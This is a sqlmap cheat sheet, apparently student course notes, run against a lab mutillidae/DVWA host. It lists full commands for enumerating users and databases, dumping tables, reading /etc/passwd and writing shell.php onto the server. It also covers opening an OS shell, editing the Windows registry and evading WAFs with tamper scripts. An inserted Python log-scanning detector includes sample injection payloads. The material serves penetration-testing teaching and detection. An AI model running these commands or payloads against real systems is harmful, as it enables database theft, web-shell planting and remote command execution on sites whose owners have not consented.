The claim that pseudo-static pages cannot be injected is wrong!
SQLMAP Automatic Injection-----Enumeration
--current-user
--current-db
--hostname
--users
--privileges -U username (CU for the current account)
--roles
--dbs
--tables, --exclude-sysdbs -D dvwa
-T user -D dvwa -C user --columns
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" -v 3 --current-user
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" -v 3 --users
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" -v 3 --privileges -U guest
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" -v 3 --roles
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" -v 3 --dbs
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" -D dvwa --tables
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" -D dvwa -T users --columns
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" -D dvwa -T users --count
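Seen from the web server's side, the enumeration requests above can still be recognised in access logs once the three tamper transformations (between, randomcase, space2comment) are undone. The following is an added example, not part of the original notes: the signature names, helper functions and sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Enumeration signatures, matched against normalised (decoded, comment-free,
# lower-cased) request text. The labels are this example's own names.
ENUM_SIGNATURES = {
    "schema-enumeration": re.compile(r"\binformation_schema\b"),
    "current-user": re.compile(r"\bcurrent_user\b"),
    "tool-user-agent": re.compile(r"\bsqlmap/"),
}
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
KEYWORD = re.compile(r"\b(select|union|from|where)\b", re.I)
BETWEEN = re.compile(r"\bnot\s+between\s+0\s+and\b", re.I)

def decode(raw):
    # Decode twice so double URL-encoding does not hide the payload.
    return unquote_plus(unquote_plus(raw))

def classify(log_line):
    """Return the enumeration signatures present once evasions are undone."""
    text = INLINE_COMMENT.sub(" ", decode(log_line)).lower()
    return sorted(n for n, rx in ENUM_SIGNATURES.items() if rx.search(text))

def tamper_hints(log_line):
    """Return which of the three tamper styles the raw request shows."""
    text = decode(log_line)
    hints = set()
    if "/**/" in text:                      # spaces replaced by comments
        hints.add("space2comment")
    if BETWEEN.search(INLINE_COMMENT.sub(" ", text)):   # '>' rewritten
        hints.add("between")
    if any(k not in (k.lower(), k.upper(), k.capitalize())
           for k in KEYWORD.findall(text)):  # keywords in mixed case
        hints.add("randomcase")
    return sorted(hints)

def scan(lines):
    """Return (index, signatures, hints) for every suspicious line."""
    return [(i, classify(l), tamper_hints(l)) for i, l in enumerate(lines)
            if classify(l) or tamper_hints(l)]

# Constructed sample access-log lines (not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=user-info.php&username=1&password=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=user-info.php&username=1%27/**/uNiOn/**/SeLeCt/**/table_name/**/FrOm/**/InFoRmAtIoN_ScHeMa.tables%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=user-info.php&username=1%27%20AND%20LENGTH(CURRENT_USER())%20NOT%20BETWEEN%200%20AND%204%23 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Matching on the normalised text rather than the raw request is the point: a rule that looks for a literal `information_schema` or a fixed-case `UNION SELECT` misses the second sample line entirely.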
SQLMAP Automatic Injection-----Enumeration
--schema --batch --exclude-sysdbs (schema metadata; --batch accepts the default options)
--count
Dump data
--dump, -C, -T, -D, --start, --stop
--dump-all --exclude-sysdbs
--sql-query "SELECT * FROM users"
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" -v 3 --schema --batch --exclude-sysdbs
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" -D dvwa -T users --dump
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" -D dvwa -T users --dump-all
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --sql-query "SELECT * FROM users"
SQLMAP Automatic Injection-----Brute Force
MySQL < 5.0: there is no information_schema database.
MySQL >= 5.0, but the account is not authorized to read information_schema.
Microsoft Access database: by default there is no permission to read the MSysObjects table.
--common-tables
--common-columns (Access system tables hold no column information)
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" --common-tables
SQLMAP Automatic Injection-----UDF Injection
--udf-inject, --shared-lib
Compile a shared library, upload it to the DB server, and create UDFs from it for advanced injection
Linux: shared object
Windows: DLL
http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857
SQLMAP Automatic Injection-----File System
--file-read="/etc/passwd"
--file-write="shell.php" --file-dest="/tmp/shell.php"
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --file-read="/etc/passwd"
# cd /root/.sqlmap/output/192.168.1.115
# ls
dump  files  log  session.sqlite  target.txt
# cd files/
# ls
_etc_passwd
# cat _etc_passwd
# vi shell.php
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --file-write="shell.php" --file-dest="/tmp/shell.php"
SQLMAP Automatic Injection-----OS
MySQL, PostgreSQL
Upload a shared library and create two UDFs, sys_exec() and sys_eval()
MSSQL
xp_cmdshell stored procedure (used if present; enabled if disabled; created if missing)
--sql-shell
--os-shell
--os-cmd
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --os-cmd
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --os-shell
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --sql-shell
SQLMAP Automatic Injection-----Windows Registry
--reg-read
--reg-add
--reg-del
--reg-key, --reg-value, --reg-data, --reg-type
sqlmap.py -u "http://1.1.1.1/a.php?id=1" --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=test --reg-type=REG_SZ --reg-data=1
SQLMAP Automatic Injection-----General
-s: location where the SQLite session file is saved
-t: location where the traffic log file is saved
--charset: force the character encoding
--charset=gbk
--crawl: crawl the site from the starting URL to the given depth
--batch --crawl=3
--csv-del: dumped data is stored by default in a CSV file delimited by ","; this option specifies a different delimiter
--csv-del=";"
--dbms-cred: specify the database account
SQLMAP Automatic Injection-----General
--flush-session: clear the session
--force-ssl
--fresh-queries: ignore query results stored in the session
--hex: when dumping non-ASCII content, encode it as hexadecimal and decode it back after it is received
sqlmap -u "http://1.1.1.1/s.php?id=1" --hex -v 3
--output-dir=/tmp
--parse-errors: parse and display the database's built-in error messages
sqlmap -u "http://1.1.1.1/sqlmap/a.php?id=1" --parse-errors
--save: save the command as a configuration file
# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=view+account+details" -p "user-agent,username" --dbs --fresh-queries --save
SQLMAP Automatic Injection-----Miscellaneous
-z: option mnemonics
sqlmap --batch --random-agent --ignore-proxy --technique=BEU -u "1.1.1.1/a.php?id=1"
sqlmap -z "bat,randoma,ign,tec=BEU" -u "1.1.1.1/a.php?id=1"
sqlmap --ignore-proxy --flush-session --technique=U --dump -D testdb -T user -u "1.1.1.1/a.php?id=1"
sqlmap -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "1.1.1.1/vuln.php?id=1"
SQLMAP Automatic Injection-----Miscellaneous
--answers
sqlmap -u "http://1.1.1.1/a.php?id=1" --technique=E --answers="extending=N" --batch
--check-waf: detect WAF/IPS/IDS
--hpp: HTTP parameter pollution
An effective way to bypass WAF/IPS/IDS
Especially effective against ASP/IIS and ASP.NET/IIS
--identify-waf: thorough WAF/IPS/IDS identification
Supports more than 30 products
SQLMAP Automatic Injection-----Miscellaneous
--mobile: emulate a smartphone
--purge-output: clear the output folder
--smart: when there are a large number of detection targets, only those with error-based detection results are selected
--wizard: wizard mode
These are student notes from the Safe Cow class; to see this course or other practical information-security material, visit the Safe Cow class.
"Safe Cow Learning Note" Sqlmap automatically injects-enumeration, BRUTE Force, UDF in